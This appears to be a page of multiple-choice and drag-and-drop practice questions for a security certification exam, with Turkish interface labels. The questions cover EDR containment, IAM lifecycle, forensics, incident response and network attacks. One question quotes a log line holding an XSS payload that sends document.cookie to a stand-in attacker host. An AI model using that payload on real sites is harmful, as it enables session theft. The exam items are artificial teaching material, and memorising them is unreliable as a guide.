Tüm alıştırma soruları
2232 soru
A security analyst receives an alert showing suspicious process activity and memory execution on an enterprise host. Which of the following actions can the analyst perform directly through an Endpoint Detection and Response (EDR) agent to immediately contain and investigate the host? (Select TWO.)
Geçerli olan tümünü seçin
An organization is redesigning its database architecture to maintain continuous uptime for a critical online transaction system. The system requires continuous availability even if an entire database server experiences a hardware controller or motherboard failure. The infrastructure team suggests installing a hardware RAID 10 array on a single database server, claiming this will meet the high availability requirement without needing additional server nodes. Which of the following best explains why this proposed solution fails to satisfy the requirement?
A security administrator receives an alert indicating that domain credentials belonging to a recently terminated employee were used to successfully log in to an internal server. Which of the following identity and access management (IAM) operational processes would have directly prevented this unauthorized access?
During an ongoing incident investigation involving an enterprise network gateway suspected of active data exfiltration, an incident responder is tasked with collecting digital evidence from the running target system to support potential legal prosecution. Which of the following procedures must the responder perform to maintain evidence integrity and adhere to forensic collection standards? (Select TWO.)
Geçerli olan tümünü seçin
During off-hours monitoring, a Security Operations Center (SOC) analyst receives a high-severity alert indicating that an unauthorized IAM access key associated with a developer account is actively making API calls to export enterprise database snapshots to an unapproved external cloud storage location. The analyst verifies that data exfiltration is currently taking place in real time. Following standard NIST SP 800-61 incident response lifecycle guidelines, which of the following actions should the analyst take FIRST?
A security operations team observes significant network degradation and inconsistent scan results during scheduled vulnerability assessments of an enterprise auto-scaling container cluster. The current scanning infrastructure relies on a centralized network scanner initiating remote, credentialed SSH/WinRM connections across dynamically assigned pod IP addresses, frequently failing when transient instances terminate mid-scan. Which architectural modification best resolves these operational scanning challenges while minimizing privileged credential transmission across the internal network?
During a threat hunting exercise, a security analyst inspects packet captures from an internal network switch interface. The analyst notes Ethernet frames containing nested 802.1Q encapsulation headers, where the outer VLAN tag matches the native VLAN ID of the trunk interface (VLAN 20) and the inner VLAN tag targets an isolated database subnet (VLAN 100). Which of the following network attacks do these frame characteristics indicate?
A security analyst is establishing the standard administrative workflow for user onboarding and offboarding within an enterprise Identity and Access Management (IAM) system. Place the following identity lifecycle steps in the correct chronological order from first to last.
Öğeleri doğru sıraya koymak için sürükleyin
A software engineering team is developing a backend service that must automatedly transmit sensitive transaction audit logs to an external analytics vendor's endpoint. The security team specifies that the integration must eliminate static, long-lived API keys in application configuration files and support short-lived, cryptographically verifiable tokens for machine-to-machine authentication. Which of the following identity and access management architecture solutions should be implemented to satisfy these requirements?
An enterprise security team needs to deploy a security capability to corporate laptops that provides continuous behavioral telemetry, process execution monitoring, and the ability to perform remote network host isolation during an incident. Which of the following technologies best meets these operational requirements?
A security analyst reviews web application request logs following a security alert. The log entry shows the following payload submitted via an unauthenticated user comment field:
`comment=<script>window.location='http://attacker.example.com/steal?c='+document.cookie</script>`
Which of the following vulnerabilities is present in the application, and which remediation control best resolves the root cause?
An IT risk manager evaluates a critical file storage server with an estimated asset value of $90,000. A recent threat assessment determines that a localized ransomware infection would result in an Exposure Factor (EF) of 30%. What is the Single Loss Expectancy (SLE) for this server in dollars?
During a post-incident review, a security analyst discovers that an attacker who gained initial access through a compromised web application loaded a custom Loadable Kernel Module (LKM) to establish a rootkit and achieve kernel-level persistence on a production Linux server. Which host hardening practice provides the MOST effective mitigation to prevent unauthorized kernel module execution?
A security administrator needs to perform a routine vulnerability scan on a critical production database server during business hours. The administrator must maximize detection accuracy for missing operating system patches while ensuring database availability is not impacted. Which of the following scanning practices should the administrator select? (Select TWO.)
Geçerli olan tümünü seçin
An enterprise security architect is designing an Identity and Access Management (IAM) framework to address several distinct security requirements across a hybrid cloud environment. Match each IAM architectural mechanism on the left with its corresponding enterprise use case on the right.
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A Security Operations Center (SOC) analyst receives an active EDR telemetry alert indicating that a Windows workstation is executing malicious code via a Living-off-the-Land (LotL) binary. Place the following Endpoint Detection and Response (EDR) containment and incident handling actions in the correct chronological order from first step to last step.
Öğeleri doğru sıraya koymak için sürükleyin
A security architect is establishing high availability guidelines for enterprise infrastructure. Which architectural control specification best matches each resilience technology?
Soldaki öğeye tıklayın, sonra eşleşen sağdaki öğeye tıklayın
Öğeler
Eşleşmeler
A forensic investigator arrives at an enterprise branch office to analyze a powered-on physical server suspected of hosting an active in-memory keylogger that exfiltrates proprietary records. To preserve evidence for legal proceedings while strictly following forensic acquisition standards, which of the following actions must the investigator take before acquiring non-volatile disk media?
During an incident response investigation, a Security Operations Center (SOC) team detects an active web shell on a public-facing web server cluster. Log telemetry confirms that the threat actor is abusing harvested service account credentials to attempt lateral movement toward the enterprise database tier. According to standard incident response lifecycle frameworks, which of the following containment actions should the Incident Response Team (IRT) execute immediately? (Select TWO.)
Geçerli olan tümünü seçin
A security operations team is implementing Just-In-Time (JIT) access controls within a Privileged Access Management (PAM) framework to reduce standing administrative privileges. Place the operational steps of a JIT privileged access session lifecycle in the correct sequential order from start to finish.
Öğeleri doğru sıraya koymak için sürükleyin